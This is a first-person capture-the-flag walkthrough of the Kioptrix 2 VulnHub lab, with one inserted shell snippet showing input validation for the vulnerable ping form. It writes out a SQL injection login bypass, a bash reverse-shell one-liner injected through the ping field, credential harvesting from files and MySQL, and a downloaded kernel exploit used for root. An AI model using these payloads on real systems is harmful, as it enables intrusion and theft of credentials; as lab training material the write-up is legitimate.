Kioptrix 2 VulnHub Walkthrough
I started this box with a netdiscover scan. It found that the target's IP was 192.168.0.131.
netdiscover -r 192.168.0.0/24
Discovered some open ports
Apache webserver with version and OS info
Some info over https
Looks like this sites running php
We also have a cups server
And a mysql server that our IP isn’t permitted to connect to:
OS and kernel info
The first thing I attempted to enumerate was the webserver. I browsed to 192.168.0.130 and found a login page.
I tried the most basic "' or 1=1--" for both username and password, and it logged me in successfully!
The prompt asked for a machine to ping, so let’s give it a try:
I tried injecting code into the text box using a few command syntaxes from different languages.
It seems like the box is running a bash script. Since ";" allowed additional commands to be included in the user input variable, let's see if we can get a reverse shell.
I issued a bash command to connect back to my machine 🙂
;bash -i >& /dev/tcp/192.168.0.129/1234 0>&1
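As an added example (not part of the original walkthrough), this is the check the ping form was missing: a POSIX shell validator that accepts only a single IPv4 address and passes it to ping as one argument, so a ";" in the input is rejected before it ever reaches a shell. The function names are my own.

```shell
#!/bin/sh
# Added example, not the Kioptrix 2 code. The vulnerable form interpolates the
# submitted value into a command string, so ";<command>" runs a second command.
# The fix is to allow-list the value as one dotted-quad IPv4 address and pass
# it as a single argv element.

# is_ipv4 VALUE -> returns 0 if VALUE is exactly one IPv4 address, else 1
is_ipv4() {
    case "$1" in
        # any character outside [0-9.], empty, leading/trailing dot, or ".."
        *[!0-9.]*|''|.*|*.|*..*) return 1 ;;
    esac
    # split on dots; positional parameters are local to the function
    set -- $(printf '%s\n' "$1" | tr '.' ' ')
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] || return 1      # no over-long octets
        [ "$octet" -le 255 ] || return 1      # 0..255 only
    done
    return 0
}

# ping_safe VALUE -> pings VALUE only if it passed validation.
# "--" ends option parsing and the quoted "$1" is one argument, so no shell
# metacharacters are ever interpreted.
ping_safe() {
    if ! is_ipv4 "$1"; then
        echo "rejected: not a single IPv4 address" >&2
        return 2
    fi
    ping -c 1 -- "$1"
}
```

Called from the PHP front end, the same rule applies: validate, then exec with the value as a single argument rather than building a command string.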
After checking my present directory and looking at some of the files, I found a username and password in the index.php file.
I also issued a cat /etc/passwd and found the user john on the system.
I tried the mysql db first and was able to log in.
I looked through the databases and found a couple of usernames and passwords.
The admin password logged me into the web app just like the SQLi, but the john user just presented me with a blank screen. I tried these passwords in combination with john/admin/root over ssh, but no luck.
I decided I needed some help, so I wanted to download Linux Exploit Suggester. I issued a command to find world-writable directories.
/var/tmp looks like a good choice. I cd'd to that dir and downloaded LES.pl.
It found a number of potential vulnerabilities
I tried the half_nelson exploit with no success, but on a second try was successful with the sock_sendpage vuln. I downloaded the exploit to my Kali machine, then issued a wget from the vulnerable VM.
I chmod'd the file and ran it, and now we have root!